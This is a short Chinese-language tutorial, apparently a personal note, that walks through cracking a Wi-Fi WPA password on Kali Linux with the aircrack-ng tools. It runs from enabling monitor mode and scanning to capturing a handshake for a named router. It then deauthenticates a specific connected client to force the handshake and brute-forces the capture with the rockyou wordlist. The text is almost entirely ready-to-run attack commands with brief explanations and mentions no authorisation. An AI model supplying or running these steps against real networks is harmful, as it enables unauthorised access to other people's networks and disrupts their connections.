1.关闭network-manager
# service network-manager stop
# airmon-ng check kill
2.启动网卡的monitor(监听)模式
# airmon-ng start wlan0
# iwconfig
3.扫描周围无线
# airodump-ng wlan0mon
1.bassid #路由器的mac地址
2.CH #信道
3.ENC #加密方式
4.开始攻击
airodump-ng -c 11 -w test --bssid 00:71:CC:17:CB:5C wlan0
#命令含义:airodump-ng -c 信道 -w 抓包生成的文件名 --bssid 路由器的mac地址 本机使用的抓包网卡名
aireplay-ng -0 10 -a 00:71:CC:17:CB:5C -c 94:E9:6A:92:4E:A4 wlan0mon
#命令含义:aireplay-ng -0 10 -a 路由器mac地址 -c 客户端mac地址 本机使用的抓包网卡名
#打断客户端链接该路由器的链接,抓包。(这里新建一个终端)
5.密码破解(跑字典)
使用Kali Linux中默认存在的字典,目录为/usr/share/wordlists/rockyou.txt.gz
解压命令:
# gunzip rockyou.txt.gz
跑字典解密
# aircrack-ng -w /usr/share/wordlists/rockyou.txt wode.cap
#命令含义:aircrack-ng -w 字典包位置 抓包生成的文件名.cap
6.关闭
# airmon-ng stop wlan0mon
# iwconfig
# service network-manager start
# ifconfig
这样就能正常连接wifi了
7.备注
字典可以自动生成,kali2018使用的是network-manager来管理网络,命令行为nmcli